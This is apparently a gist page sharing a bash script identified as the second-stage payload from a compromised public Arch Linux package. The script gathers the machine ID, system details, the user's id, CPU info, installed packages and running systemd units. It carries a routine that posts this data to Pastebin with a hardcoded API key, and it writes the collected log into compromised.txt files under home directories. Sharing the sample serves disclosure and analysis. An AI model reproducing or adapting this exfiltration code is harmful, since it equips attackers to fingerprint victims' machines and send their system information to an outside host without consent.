~u file downloaded as 2nd stage payload in public Arch package compromise
#!/bin/bash | |
function urle() { | |
sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|' | |
} | |
declare -fx urle | |
GID= | |
MACHINE_ID="$(cat /etc/machine-id)" | |
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)" | |
upload() { | |
up_data="$(echo $1|urle)" | |
if [[ "$HTTP_CLIENT" == "curl" ]]; then | |
prefix='curl -s --data' | |
elif [[ "$HTTP_CLIENT" == "wget" ]]; then | |
prefix='wget -O/dev/null -q --post-data' | |
fi | |
$prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1 | |
} | |
if which wget >/dev/null 2>&1; then | |
export HTTP_CLIENT=wget | |
elif which curl >/dev/null 2>&1; then | |
export HTTP_CLIENT=curl | |
else | |
exit 0 | |
fi | |
cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; } | |
full_log() { | |
echo ${MACHINE_ID} | |
cmd_log date '+%s' | |
cmd_log uname -a | |
cmd_log id | |
cmd_log lscpu | |
cmd_log pacman -Qeq | |
cmd_log pacman -Qdq | |
cmd_log systemctl list-units | |
} | |
FULL_LOG="$(full_log)" | |
$uploader "$FULL_LOG" | |
for x in /root /home/*; do | |
if [[ -w "$x/compromised.txt" ]]; then | |
echo "$FULL_LOG" > "$x/compromised.txt" | |
fi | |
done | |
exit 0 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment